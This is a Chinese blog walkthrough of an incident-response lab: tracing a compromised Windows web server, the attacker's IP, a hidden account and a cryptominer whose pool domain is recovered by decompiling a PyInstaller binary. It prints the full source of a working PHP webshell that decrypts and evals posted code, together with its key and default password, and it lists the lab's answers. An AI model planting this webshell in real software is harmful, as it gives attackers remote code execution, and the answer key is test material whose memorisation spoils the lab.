当前位置: 首页 > article >正文

Windows Server 2022 Web1

载入靶机,看到相关描述:


进入虚拟机发现桌面有phpstudy和解题两个软件:


打开解题.exe,发现里面是一些问题,接下来就需要获取相关信息:

1、shell密码

2、IP地址

3、隐藏账户名称

4、挖矿程序的矿池域名


打开phpstudy查看一下相关线索:


找到web目录


复制“蓝队应急响应工具箱”粘贴到winserver 2022中:


使用”D盾“:

发现后门


<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

注释直接指明密码是rebeyond,第一问解决


再回到phpstudy中,找到Apache的日志文件

成功得到攻击者的IP地址:192.168.126.1,第二问解决


而且发现大量POST请求信息,明显的爆破行为,推测存在弱口令:


使用”Windows日志一键分析“:

可看到未知用户名:hack168,第三问解决

(当然也能可以看到攻击者IP地址)


找到hack168$目录寻找别的线索:

找到个”Kuang.exe“文件,看字母应该就是挖矿程序,运行一下,发现CPU占用率飙升

我勒个CPU使用率100%

可以确定挖矿程序就是”Kuang.exe“


看图标可以看出是个pyinstaller打包

根据之前写过的文章的《[SWPUCTF 2022 新生赛]py1》内容,进行反编译,将Kuang.exe复制粘贴到bucket目录:


运行main.py文件:


得到两个新文件:

按理说应该得到一个文件夹(通常名字叫XXX.exe_extracted)才对,但还是继续做下去看看情况吧


Kuang.py文件打开内容如下:


Kuang.pyc文件内容如下,虽然有乱码,但可以发现关键内容有域名信息:

得到矿池域名:wakuang.zhigongshanfang.top(注意:得去掉http://头),第四问解决,这里有乱码,不太好反编译,但还是尝试一下能不能成功


(注意:本来我是先放到在线反编译pyc网站中运行,发现没法运行的时候就改用010editor改文件头了)

用010editor打开pyc文件,添加文件头33 0D 0D 0A 00 00 00 00 00 00 00 00:


保存之后复制粘贴到pycdc.exe的同级目录下:


pycdc.exe Kuang.pyc > Kuang.py

果然失败了,要么是文件头改错了,要么是生成的pyc文件有点问题


或者使用另一种工具得到pyc文件

https://github.com/extremecoders-re/pyinstxtractor/tree/2024.04/pyinstxtractor


将Kuang.exe文件复制粘贴到同级目录下再运行pyinstxtractor.py文件:


多了个文件夹:

得到pyc文件


放到在线反编译pyc网站中运行一下:

也是成功看到矿池域名是:wakuang.zhigongshanfang.top


当然,也可以放到pycdc.exe的同级目录下:


pycdc.exe Kuang.pyc > Kuang.py


生成了Kuang.py文件:


打开之后也是一样的代码:

一样可以得到矿池域名:wakuang.zhigongshanfang.top


双击”解题.exe“,填入所有的答案:

rebeyond

192.168.126.1

hack168

wakuang.zhigongshanfang.top

(这里不知道为什么填了最后一个问题就会退出”解题.exe“的cmd终端界面,就用了张别人的图来展示一下)


http://www.kler.cn/a/403103.html

相关文章:

  • PDF电子发票信息转excel信息汇总
  • PDF内容提取,MinerU使用
  • CSS布局学习2
  • JDK1.8新增特性
  • 如何使用Jmeter做性能测试?
  • RocketMQ: 集群部署注意事项
  • misc设备驱动
  • [系统安全]PE文件头中的重定位表
  • springboot-事务失效以及排查过程
  • wife_wife
  • 设计探测1飞伏的装置可能吗?
  • gitlab ci/cd搭建及使用笔记(三)
  • 常见协议所对应的漏洞
  • 如何在 Ubuntu 上使用 Docker 部署 LibreOffice Online
  • 基于isSpring的PPT转换
  • 计算机视觉中的双边滤波:经典案例与Python代码解析
  • Win本地部署大模型推理API封装调用
  • 关于win11电脑连接wifi的同时,开启热点供其它设备连接
  • lua脚本使用redis
  • word设置交叉引用快捷键和居中快捷键
  • Streamlit + AI大模型API实现视频字幕提取
  • 统计机器学习——线性回归与分类
  • CSS 3D球形旋转
  • shell脚本2---清风
  • StructRAG Boosting Knowledge 论文笔记
  • Genuine-OJ 是一个现代化的在线评测系统(Online Judge, OJ)